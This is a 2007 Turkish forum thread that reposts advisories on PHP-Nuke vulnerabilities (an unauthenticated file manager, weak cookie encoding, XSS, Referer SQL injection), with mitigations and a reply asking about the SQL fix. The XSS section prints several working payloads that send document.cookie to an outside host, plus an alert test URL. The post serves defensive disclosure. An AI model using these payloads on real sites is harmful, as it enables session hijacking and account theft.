Tarih: 2007-10-05, 22:59:28 Mesaj konusu: Php-Nuke ve Güvenlik açıkları..
Kullandığımız portallar ne kadar güvenli birde burdan bakalım..
PHP Nuke dosya kopyalama ve silme açığı ;
PHP Nuke, PHP script dili ile uygulanmış bir web portal yaratma ve yönetim
paketidir. Varsayılan kurulum ile, sunucu dosya sistemindeki dosyaları kopyalama
ve silmede kullanılabilen 'admin/case/case.filemanager.php' script`i gelmektedir.
Script, sadece kimlik tanılamasında sorumlu bir administrative script`ten çağrıldığına
emin olan bir kod içeriyor fakat bunun uygulanışı hatalı. Sonuç olarak uzaktaki
herhangi bir kullanıcı kimlik tanılaması olmadan direk olarak script`i çağırabilir ve
script`in çalıştığı kullanıcı haklarına göre sunucu üzerinde herhangi bir dosyayı
kopyalayabilir, silebilir.
Çözüm:
Magnux Software aşağıdaki çözümü önermiş:
Web sunucusu dosya sistemine erişimi engellemek için aşağıdaki komutlar
kullanılabilir:
# cd php-nuke-document-root
# chmod 0 admin/case/case.filemanager.php
Henüz bir yama çıkmadı.
PHP Nuke kullanıcı c o o k i e`si zayıf kriptolama açığı
Bir kullanıcıya PHP-Nuke tabanlı bir sayfada kimlik tanılaması uygulandığında
kullanıcı hesabı ve şifreyi içeren bir c o o k i e yaratılıyor. Şifre 'Base 64 encoding' ile
kodlanıyor ve c o o k i e içeriğine erişebilen herkes tarafından kolaylıkla dekod
edilebilir. Bunun sonucunda kullanıcının hesabının ele geçirilmesi mümkün.
PHP-Nuke`un eski sürümlerininde bu açıktan etkilenmesi muhtemel. PostNuke
0.6.4`de bu açıktan etkileniyor.
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Etkilenmeyenler:
PHP-Nuke çapraz site betik çalıştırma açıkları
PHP-Nuke'da çeşitli çapraz site betik çalıştırma (XSS-Cross Site Scripting) açıkları olduğu rapor edildi.
Bir saldırgan, kullanıcıların kötü amaçlı bir linki ziyaret etmesini sağlayarak bu açıktan yararlanabilir. Saldırganın sağladığı HTML ve betik kodu web istemcisinde çalıştırılabilir.
Saldırganlar bu açığı web içeriğini farklı göstermek veya çerez-tabanlı kimlik tanılama bilgilerini çalmak için kullanabilirler.
Örnek:
Aşağıdaki örnekler Matthew Murphy tarafından sağlanmış:
<SCRI*PT>location.href="http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref="+document.URL+"c o o k i e="+document.c o o k i e;
<B
STYLE="left:expression(e v a l('location.href=\'http://www.techie.hopto.org/
fetch.php?email=mattmurphy@kc.rr.com&ref=\'+document.URL+\'c o o k i e=\'+
document.c o o k i e'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
email=mattmurphy@kc.rr.com&ref='+document.URL+'c o o k i e='+document.c o o k i e">Keep
Away!</B>
Çözüm:
Henüz bir yama çıkmadı.
Açığı gerçekleştirme
Yerel:
Hayır
Uzaktan:
Evet
Etkilenen Sistemler
Etkilenenler:
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1
Etkilenmeyenler:
PHP-Nuke HTTP "referer" SQL sorgusu ekleme açığı
HTTP başlığının referer alanında gönderilen veriler, index.php dosyasında SQL sorgusunda kullanılmadan önce doğru olarak filtrelenmiyor.
Açığın 7.9 sürümünde olduğu onaylandı ve 8.0 sürümünün de etkilendiği rapor edildi. Diğer sürümler de etkileniyor olabilir.
Çözüm:
index.php kaynak kodunda değişiklik yaparak doğru filtrelemenin yapılmasını sağlayın.
PHP-Nuke'ta yeni bir çapraz site betik çalıştırma açığı bulunduğu rapor edildi. Web isteklerinin düzgün kontrol edilmemesi sonucu betik kodlarının PHP script isteklerine gömülmesi mümkün oluyor.
Bu sayede uzaktaki bir saldırgan çerez-tabanlı kimlik tanılama bilgilerini çalabilir.
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 BETA 1
Etkilenmeyenler:
PHPNuke Cross-Site Scripting güvenlik açığı
PHPNuke cross-site scripting açığından etkileniyor. Kötü amaçlı script kodunu içeren
PHPNuke kullanıcı bilgileri sayfası user.php`ye bir link yaratmak mümkün.
Durumdan şüphelenmeyen bir web kullanıcısı linke tıkladığında kötü amaçlı kod
çalışıyor.
Bu saldırı ile bir kullanıcının, etkilenen PHPNuke sitesine ait c o o k i e`lerdeki kimlik
tanılama bilgileri çalınabilir.
PostNuke`un da etkilendiği rapor edildi.
Aşağıdaki örnek bir alarm kutusunu görüntülenmesini sağlıyor:
http://phpnukesite/user.php?op=userinfo&uname=<script>a l e r t(document.c o o k i e);</script>
Çözüm:
Geçici çözüm:
Web browser`ın özelliklerini kullanarak JavaScript çalıştırılmasını kapatın.
Henüz bir yama çıkmadı.
Francisco Burzi PHP-Nuke 1.0
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.4.1a
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.2a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PostNuke 0.62
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.63
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Francisco Burzi PostNuke 0.64
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
Etkilenmeyenler:
( Alıntıdır )
Php-Nuke içinde bunların dışında bildiğiniz açıklar varsa burda yazmanızı öneririm. ki bizde ona göre açıklarımızı kapatıp daha güvenli bir web sitesi hazırlayalım..
Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim
Tarih: 2007-10-05, 23:12:33 Mesaj konusu:
yazını sonuna kadar okudum bu güzel paylaşım için teşekürler.Biraz yorum yapmak gerekirse artık bu hack metotları eskide kaldı ancak biri dikkatimi çekti.http önerenlerde sql açığı demişsin. nuke 8 de dahil olmak üzere etkileniyor demişsin.İndex.php değşiiklik ile giderilebilinir diye bir ibare var bunu biraz daha açıklayabilimisin?
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız